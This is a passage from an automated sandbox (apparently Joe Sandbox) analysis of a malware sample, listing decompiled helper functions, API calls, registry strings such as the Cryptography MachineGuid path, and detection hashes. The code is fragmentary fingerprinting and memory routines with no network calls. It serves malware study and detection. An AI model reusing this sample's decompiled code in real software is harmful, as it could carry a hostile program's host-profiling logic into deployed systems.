RegQueryValueExW.KERNEL32(?,00000000,00000001,00000000,00000104), ref: 0040A659
RegCloseKey.ADVAPI32(?), ref: 0040A666

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0040A62A

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 3677997916-1514646153
Opcode ID: 1233372230aca0e7df5d087625ad0dd89436495b9e8128ba46b7d0fdcd860ef1
Instruction ID: b7295adda02a32b73446885dd9b7f16e439bc7fa4040cb3c3f6055cefdfb8544
Opcode Fuzzy Hash: 1233372230aca0e7df5d087625ad0dd89436495b9e8128ba46b7d0fdcd860ef1
Instruction Fuzzy Hash: F2F0F4B6A00214BBEB148BA5ED46FDE7BB8EB84700F040075FB00F22D0C6B09E14CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041FAB0 Relevance: 6.3, APIs: 4, Instructions: 326COMMON

Download Yara Rule

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041FB3B

Part of subcall function 00415840: __calloc_dbg_impl.LIBCMTD ref: 00415867
Part of subcall function 00415840: __errno.LIBCMTD ref: 0041587E
Part of subcall function 00415840: __errno.LIBCMTD ref: 00415887

__nh_malloc_dbg.LIBCMTD ref: 0041FC67

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno__nh_malloc_dbg$__calloc_dbg_impl
String ID:
API String ID: 2503616996-0
Opcode ID: 778e38bc6efd97f1c7f924d20f97de91371a753f1577105e6e19857a5e9c0ec2
Instruction ID: 917154f0986699b353dad1ef751c0d4a147727080a5085d724b1d19719880e11
Opcode Fuzzy Hash: 778e38bc6efd97f1c7f924d20f97de91371a753f1577105e6e19857a5e9c0ec2
Instruction Fuzzy Hash: A4E11C74E04248CFDB24CFA4D894BADFBB1BB49314F24826ED8666B392D7349846CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040A503 Relevance: 5.0, APIs: 4, Instructions: 38
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040A503(WCHAR* __ecx, WCHAR* __edx) {
				WCHAR* _v8;
				void* __ebx;
				void* __esi;
				int _t7;
				void* _t10;
				WCHAR* _t16;
				void* _t32;

				_push(__ecx);
				_t16 = __edx;
				_v8 = __ecx;
				_t7 = lstrlenW(__edx);
				_t3 = lstrlenW(_v8) + 0x80; // 0x80
				_t10 = LocalAlloc(0x40, _t3 + _t7 + _t3 + _t7); // executed
				_t32 = _t10;
				E0040185F(_t32, _t28, _v8);
				E0040188C(_t16, _t32, _t28, _t32, _t16);
				GlobalFree(_v8); // executed
				return _t32;
			}

0x0040a506
0x0040a510
0x0040a513
0x0040a516
0x0040a525
0x0040a533
0x0040a538
0x0040a53e
0x0040a548
0x0040a550
0x0040a55c

APIs

lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
GlobalFree.KERNEL32(?), ref: 0040A550

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocFreeGlobalLocal
String ID:
API String ID: 3873415381-0
Opcode ID: 7439b9250609968e6e63ff34dd066d63b489fcc9440e39b785881af818bd08f0
Instruction ID: a16c6b1f1c1aff7e88faa53ff7a807ce8724a9faba81c89562836050573d755b
Opcode Fuzzy Hash: 7439b9250609968e6e63ff34dd066d63b489fcc9440e39b785881af818bd08f0
Instruction Fuzzy Hash: DCF02472700014FFCB04A79A9D45DAEF7AEEFC4340B144076E900F3321DAB09E018AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041556A Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156F9
_memset.LIBCMT ref: 00415716
_memset.LIBCMT ref: 00415731

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 69410c4095798773577b1bc710edf945ef39628d419657129ea33efc134ce160
Instruction ID: 23e798914de5c24cc93c4aaee41f7ebc1c487050272a37944d5bfb3b0d472494
Opcode Fuzzy Hash: 69410c4095798773577b1bc710edf945ef39628d419657129ea33efc134ce160
Instruction Fuzzy Hash: 7551FCB4A01204DFCB18CF45D995BDA77F1BB88315F24816AE9156B391D335EE80CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3E4 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040A3E4(intOrPtr __ecx, intOrPtr* __edx, signed int _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _t18;
				void _t25;
				void* _t26;
				intOrPtr* _t27;
				intOrPtr _t29;
				signed int _t31;
				void* _t33;
				void* _t34;
				signed int _t35;
				void* _t37;
				void* _t39;

				_t27 = __edx;
				_v12 = __edx;
				_v8 = __ecx;
				_t18 = LocalAlloc(0x40, 0x80 +  *((intOrPtr*)( *0x40e08c))(__ecx, _t34, _t37, _t26, __ecx, __ecx) * 2); // executed
				_t31 = _a4;
				_t39 = _t18;
				_t35 = _a8;
				if(_t31 < _t35) {
					_t29 = _v8;
					_t33 = _t39;
					do {
						_t25 =  *((intOrPtr*)(_t29 + _t31 * 2));
						_t31 = _t31 + 1;
						 *_t33 = _t25;
						_t33 = _t33 + 2;
					} while (_t31 < _t35);
					_t27 = _v12;
				}
				 *((short*)(_t39 + 2 + _t35 * 2)) = 0;
				 *_t27 =  *((intOrPtr*)( *0x40e13c))( *_t27, _t39);
				if(_t39 != 0) {
					LocalFree(_t39);
				}
				return 1;
			}

0x0040a3f6
0x0040a3fa
0x0040a3fd
0x0040a40c
0x0040a40e
0x0040a411
0x0040a413
0x0040a418
0x0040a41a
0x0040a41d
0x0040a41f
0x0040a41f
0x0040a423
0x0040a424
0x0040a427
0x0040a42a
0x0040a42e
0x0040a42e
0x0040a436
0x0040a442
0x0040a446
0x0040a449
0x0040a449
0x0040a456

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

Strings

y@, xrefs: 0040A434

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$AllocFree
String ID: y@
API String ID: 2012307162-1812993971
Opcode ID: ccb5b4be9ee1bd7769a826cb499616f7c5e28c2612ab748d711503cbdb706c51
Instruction ID: f3cb8fed4fc86e8926e4ae745f77bd99f1ad2e4c346b1d96af304dd36abb34b3
Opcode Fuzzy Hash: ccb5b4be9ee1bd7769a826cb499616f7c5e28c2612ab748d711503cbdb706c51
Instruction Fuzzy Hash: 8501D475610224AFDB15CF99DC80DAE77F9EF8C720B10856AE905E7310E770AD11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040942A Relevance: 4.5, APIs: 3, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040942A(intOrPtr* _a4) {
				struct _MEMORYSTATUSEX _v68;
				signed int _t10;
				void* _t26;
				void* _t27;
				int _t29;
				intOrPtr* _t30;

				_t10 =  *0x40e02c;
				_t29 = 0x40;
				_v68.dwLength = _t29;
				GlobalMemoryStatusEx( &_v68); // executed
				if(_t10 != 0) {
					_t27 =  *((intOrPtr*)( *0x40e044))(_t29, 0x400, _t26);
					wsprintfW(_t27,  *0x40e290, (_v68.ullAvailPhys << 0x00000020 | _v68.ullTotalPhys) >> 0x14, _v68.ullAvailPhys >> 0x14);
					_t30 = _a4;
					 *_t30 = E0040A503( *_t30, _t27);
					LocalFree(_t27);
					return 1;
				}
				return _t10 | 0xffffffff;
			}

0x00409430
0x0040943b
0x0040943d
0x00409440
0x00409444
0x0040945c
0x00409471
0x00409477
0x00409487
0x00409489
0x00000000
0x00409492
0x00000000

APIs

GlobalMemoryStatusEx.KERNEL32(?,74CB5850,?,?,?,?,?,?,?,?,?,00409A7D,00000000,00000000,00000000,00000000), ref: 00409440
wsprintfW.USER32 ref: 00409471
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00409A7D,00000000), ref: 00409489

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeGlobalLocalMemoryStatuswsprintf
String ID:
API String ID: 2569036613-0
Opcode ID: 83f1654dcc05b53d43e431b084b5fe3b6a1efbc40edc83de6259096369b80c23
Instruction ID: 691c7a2968302921ddf9a2c3bc51e1d1d0e2bb0df5734c172083d1d357432de7
Opcode Fuzzy Hash: 83f1654dcc05b53d43e431b084b5fe3b6a1efbc40edc83de6259096369b80c23
Instruction Fuzzy Hash: 6501D671A00114ABD700DF6AEC04E6FBBB9EB84324B00453DF616F7291D6749912C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C2 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A4C2(char* __ecx) {
				short* _t7;
				int _t11;
				char* _t14;
				short* _t16;

				_t14 = __ecx;
				_t11 =  *((intOrPtr*)( *0x40e198))(__ecx);
				_t7 = LocalAlloc(0x40, 0x10 + _t11 * 2); // executed
				_t16 = _t7;
				MultiByteToWideChar(0xfde9, 0, _t14, 0xffffffff, _t16, _t11);
				_t16[_t11] = 0;
				return _t16;
			}

0x0040a4ca
0x0040a4d5
0x0040a4e1
0x0040a4e4
0x0040a4f1
0x0040a4f9
0x0040a502

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00407793), ref: 0040A4E1
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,76426c3f362f5a47a469f0e9d8bc3eef,000000FF,00000000,00000000,?,?,?,00000000,00407793), ref: 0040A4F1

Strings

76426c3f362f5a47a469f0e9d8bc3eef, xrefs: 0040A4CC, 0040A4E9

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocByteCharLocalMultiWide
String ID: 76426c3f362f5a47a469f0e9d8bc3eef
API String ID: 3282395022-820280900
Opcode ID: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
Instruction ID: 821f2f2a5b45e58665a0b52f3e5465d9484d76db546a2d81d506fa24111d9f92
Opcode Fuzzy Hash: 620967e8831f66a80d015b3e32f1d5a571271f4666585bf4ea6a08314ec2853b
Instruction Fuzzy Hash: 88E0D8713001207FE21057AA9C84FA76AE8DBC9770F140536F318E72B0D9B01C1083B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041536F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

QQ, xrefs: 00415369

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID:
String ID: QQ
API String ID: 0-3460843698
Opcode ID: f473cefecd5df86fe97d96c8c56a9dbe05cfdfb6797da776bccff34878467c9c
Instruction ID: 35e6eb4f20574c1da3e2a9a82b2d582b64595e55fb0d9e4c6343fd8c0ced53de
Opcode Fuzzy Hash: f473cefecd5df86fe97d96c8c56a9dbe05cfdfb6797da776bccff34878467c9c
Instruction Fuzzy Hash: 880119B5A0150DEBDB04CF54D940BEF73B4AB88384F10855AFC298B340D3B8EA91DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00424366 Relevance: 3.0, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

___crtExitProcess.LIBCMTD ref: 00424375

Part of subcall function 0041D740: ___crtCorExitProcess.LIBCMTD ref: 0041D749

RtlAllocateHeap.NTDLL(0045F044,00000000,00000001), ref: 004243A8

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: ExitProcess___crt$AllocateHeap
String ID:
API String ID: 215841669-0
Opcode ID: fd577c789abfe75a794f6c840ab4e926d32faf681ac1f8a682a6a37b6ce83210
Instruction ID: c68fea34626bc608a6216b9c412624a9537ea85e6661c0bdf65d2760b835db09
Opcode Fuzzy Hash: fd577c789abfe75a794f6c840ab4e926d32faf681ac1f8a682a6a37b6ce83210
Instruction Fuzzy Hash: 7BE09274B00214ABDB14DF90F84A7AE3720EB80309F04413AEE060A292E2799985C78B

Uniqueness

Uniqueness Score: -1.00%

Function 00408619 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00408619(void* __ecx) {
				WCHAR* _v8;
				void* __ebx;
				void* __esi;
				void* _t8;
				int _t9;
				void* _t12;
				void* _t23;
				void* _t37;
				void* _t39;
				void* _t41;

				_t8 = LocalAlloc(0x40, 0xff78); // executed
				L1(); // executed
				L1(); // executed
				_t23 = _t8;
				_t39 = _t37;
				_push(_t23);
				_push(_t39);
				_t18 = L"\r\n\r\n";
				_v8 = _t23;
				_t9 = lstrlenW(L"\r\n\r\n");
				_t3 = lstrlenW(_v8) + 0x80; // 0x80
				_t35 = _t3 + _t9;
				_t12 = LocalAlloc(0x40, _t3 + _t9 + _t3 + _t9); // executed
				_t41 = _t12;
				E0040185F(_t41, _t35, _v8);
				E0040188C(L"\r\n\r\n", _t41, _t35, _t41, _t18);
				GlobalFree(_v8); // executed
				return _t41;
			}

0x00408628
0x0040862e
0x0040863a
0x00408644
0x00408646
0x0040a506
0x0040a508
0x0040a510
0x0040a513
0x0040a516
0x0040a525
0x0040a52b
0x0040a533
0x0040a538
0x0040a53e
0x0040a548
0x0040a550
0x0040a55c

APIs

LocalAlloc.KERNEL32(00000040,0000FF78,00000000,00407870), ref: 00408628

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

Strings

, xrefs: 0040863F

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AllocLocallstrlen$FreeGlobal
String ID:
API String ID: 937752025-2344752452
Opcode ID: 482bd3e95f8a1391787724097fa78bad6b17d3e2392d187080f3f25d15401523
Instruction ID: d28f653e51836c90490366c206293b127019c736856f4bca57a512f3e5c56564
Opcode Fuzzy Hash: 482bd3e95f8a1391787724097fa78bad6b17d3e2392d187080f3f25d15401523
Instruction Fuzzy Hash: 03D0A720F4831067CF14BAB54C15F2E22929B84320B20883A6205BF3C4CABCDC1183CD

Uniqueness

Uniqueness Score: -1.00%

Function 02080E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,02080223,?,?), ref: 02080E19
SetErrorMode.KERNEL32(00000000,?,?,02080223,?,?), ref: 02080E1E

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 0594162c44c975425590a9f4248303b472abad866a18c321087184769bf3c7dc
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 20D0123214522877D7413A94DC09BCE7B5CDF05B66F008011FB0DD9080C770954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A16F Relevance: 2.6, APIs: 2, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0040A16F(void* __ecx, void* __edx, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _t12;
				short _t13;
				void* _t16;
				signed int _t17;
				void* _t18;
				signed int _t24;
				void* _t25;
				void* _t26;
				void* _t29;
				signed int _t34;
				signed int _t36;
				void* _t37;
				void* _t40;
				void* _t41;
				signed short* _t43;
				intOrPtr* _t44;

				_t26 = __edx;
				_t12 =  *((intOrPtr*)( *0x40e18c))(__ecx, __edx, _t37, _t25, __ecx);
				_v8 = _t12;
				if(_t12 == 0) {
					_t13 = 0;
				} else {
					_t16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(__ecx, _t41) + _t14); // executed
					_t40 = _t16;
					_t17 =  *((intOrPtr*)( *0x40e08c))(_t26);
					_t36 = 0;
					_t43 = _v8 + _t17 * 2;
					_t34 =  *_t43 & 0x0000ffff;
					_t18 = 0x22;
					if(_t34 != _t18) {
						_t24 = 0;
						_t29 = 0x22;
						do {
							_t36 = _t36 + 1;
							 *(_t24 + _t40) = _t34;
							_t24 = _t36 + _t36;
							_t34 =  *(_t24 + _t43) & 0x0000ffff;
						} while (_t34 != _t29);
					}
					_t44 = _a8;
					 *((short*)(_t40 + _t36 * 2)) = 0;
					 *_t44 =  *((intOrPtr*)( *0x40e13c))( *_t44, _t40); // executed
					LocalFree(_t40); // executed
					_t13 = 1;
				}
				return _t13;
			}

0x0040a17a
0x0040a180
0x0040a182
0x0040a187
0x0040a1f8
0x0040a189
0x0040a19e
0x0040a1a6
0x0040a1a9
0x0040a1ae
0x0040a1b2
0x0040a1b5
0x0040a1b8
0x0040a1be
0x0040a1c2
0x0040a1c4
0x0040a1c5
0x0040a1c5
0x0040a1c6
0x0040a1ca
0x0040a1cd
0x0040a1d1
0x0040a1c5
0x0040a1d6
0x0040a1dc
0x0040a1ea
0x0040a1ec
0x0040a1f4
0x0040a1f5
0x0040a1fd

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,00401D77,?,?), ref: 0040A19E
LocalFree.KERNELBASE(00000000,?,00401D77,?,?), ref: 0040A1EC

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: a4121b4af304f9e425f871450021feb797f2bc1189384325bfc8c16f67230c56
Instruction ID: 58c5dcfe122550f1dd4d580a845b1fe98dc3c348f2ec0a40c79b731157ff0f5b
Opcode Fuzzy Hash: a4121b4af304f9e425f871450021feb797f2bc1189384325bfc8c16f67230c56
Instruction Fuzzy Hash: E811E572210111AFE704DFAADD8097AB3FDEF89710B50483AE581EB2A0EAB49C118725

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB24 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__nh_malloc_dbg.LIBCMTD ref: 0041FB3B

Part of subcall function 00415840: __calloc_dbg_impl.LIBCMTD ref: 00415867
Part of subcall function 00415840: __errno.LIBCMTD ref: 0041587E
Part of subcall function 00415840: __errno.LIBCMTD ref: 00415887

__nh_malloc_dbg.LIBCMTD ref: 0041FC67

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno__nh_malloc_dbg$__calloc_dbg_impl
String ID:
API String ID: 2503616996-0
Opcode ID: 4038e884bfdae926c20c9a15fb021c6f46d336c8b207d7308693c02cbaf8b1c3
Instruction ID: 85d9ec527e6cbaaf126460574926a2b9f3ef66150f98be4b475bbf6d45bffd36
Opcode Fuzzy Hash: 4038e884bfdae926c20c9a15fb021c6f46d336c8b207d7308693c02cbaf8b1c3
Instruction Fuzzy Hash: 34E0D871E48704DAD7309A559C027987720E740734F60432FE535261C1D67914068E19

Uniqueness

Uniqueness Score: -1.00%

Function 0041B700 Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 0041B707

Part of subcall function 0041B630: __crt_wait_module_handle.LIBCMTD ref: 0041B67C
Part of subcall function 0041B630: RtlEncodePointer.NTDLL(?), ref: 0041B6B7

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: EncodePointer__crt_wait_module_handle__encode_pointer
String ID:
API String ID: 2010845264-0
Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction ID: e1cb89af54fb0291e7bf1286e9e6485c2d4d8aea64d1d4d7b257b16ee444ded5
Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
Instruction Fuzzy Hash: 69A0127244430C23D00020833807B02350C83D0638F080021F50C051422842A45540D7

Uniqueness

Uniqueness Score: -1.00%

Function 00413410 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMTD ref: 00413415

Part of subcall function 00413430: _check_managed_app.LIBCMTD ref: 004134AC
Part of subcall function 00413430: __heap_init.LIBCMTD ref: 004134B6
Part of subcall function 00413430: _fast_error_exit.LIBCMTD ref: 004134C4
Part of subcall function 00413430: __mtinit.LIBCMTD ref: 004134CC
Part of subcall function 00413430: _fast_error_exit.LIBCMTD ref: 004134D7
Part of subcall function 00413430: __RTC_Initialize.LIBCMTD ref: 004134E9
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 00413500
Part of subcall function 00413430: ___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
Part of subcall function 00413430: ___setargv.LIBCMTD ref: 0041351D
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 00413528
Part of subcall function 00413430: __setenvp.LIBCMTD ref: 00413530
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 0041353B
Part of subcall function 00413430: __cinit.LIBCMTD ref: 00413545
Part of subcall function 00413430: __amsg_exit.LIBCMTD ref: 0041355A
Part of subcall function 00413430: __wincmdln.LIBCMTD ref: 00413562

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __amsg_exit$_fast_error_exit$EnvironmentInitializeStrings___crt___security_init_cookie___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
String ID:
API String ID: 529411476-0
Opcode ID: 45f551d739f39a4670a7d44ae8a496925fb138a71fc8cac8b44441fd73265ad2
Instruction ID: 23dc5b0091ebacf0523ce2f5ffb20dfc56603b355b79bbbadf5d9a9dcab6b5c7
Opcode Fuzzy Hash: 45f551d739f39a4670a7d44ae8a496925fb138a71fc8cac8b44441fd73265ad2
Instruction Fuzzy Hash: 6EA022320002FC02000233E33003A8A320C08C032C3C8000BB00C030030C0CA8C080BE

Uniqueness

Uniqueness Score: -1.00%

Function 02080920 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02080929

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126

Uniqueness

Uniqueness Score: -1.00%

Function 00408FA5 Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E00408FA5(void* __ecx) {
				void* _v8;
				void* _v12;
				char _v604;
				intOrPtr* _t19;
				void* _t20;
				intOrPtr* _t34;
				intOrPtr* _t36;
				intOrPtr* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t48;
				void* _t52;
				void* _t53;

				_t19 =  *0x40e190; // 0x7677b690
				_t53 = 0;
				_v8 = 0;
				_t20 =  *_t19(0x40c030, 0, 1, 0x40c010,  &_v8); // executed
				if(_t20 < 0) {
					L3:
					return 0;
				}
				_t40 = _v8;
				_push( &_v12);
				_v12 = 0;
				_push(0x40c020);
				_push(_t40);
				if( *((intOrPtr*)( *_t40))() >= 0) {
					_t41 = _v12;
					_push(0);
					_push(_t41);
					if( *((intOrPtr*)( *_t41 + 0x14))() >= 0) {
						_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
						if(_t52 == 0) {
							goto L3;
						}
						_t48 = _v8;
						_push(0);
						_push( &_v604);
						_push(0x104);
						_push(_t52);
						_push(_t48); // executed
						if( *((intOrPtr*)( *_t48 + 0xc))() >= 0) {
							_t53 = _t52;
						} else {
							LocalFree(_t52);
						}
						_t43 = _v12;
						 *((intOrPtr*)( *_t43 + 8))(_t43);
						_t44 = _v8;
						 *((intOrPtr*)( *_t44 + 8))(_t44);
						return _t53;
					}
					_t34 = _v12;
					 *((intOrPtr*)( *_t34 + 8))(_t34);
				}
				_t36 = _v8;
				 *((intOrPtr*)( *_t36 + 8))(_t36);
				goto L3;
			}

0x00408fae
0x00408fb7
0x00408fbc
0x00408fcd
0x00408fd1
0x00408ff4
0x00000000
0x00408ff4
0x00408fd3
0x00408fd9
0x00408fda
0x00408fdd
0x00408fe4
0x00408fe9
0x00408ffa
0x00408ffd
0x00408fff
0x00409007
0x00409022
0x00409026
0x00000000
0x00000000
0x00409028
0x00409031
0x00409032
0x00409033
0x0040903a
0x0040903b
0x00409041
0x0040904c
0x00409043
0x00409044
0x00409044
0x0040904e
0x00409054
0x00409057
0x0040905d
0x00000000
0x00409060
0x00409009
0x0040900f
0x0040900f
0x00408feb
0x00408ff1
0x00000000

APIs

LocalFree.KERNEL32(00000000), ref: 00409044

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 38dd199c4f0c121f0ad27b3cccfc0052999ba1917e57d09d5119ecbd186de782
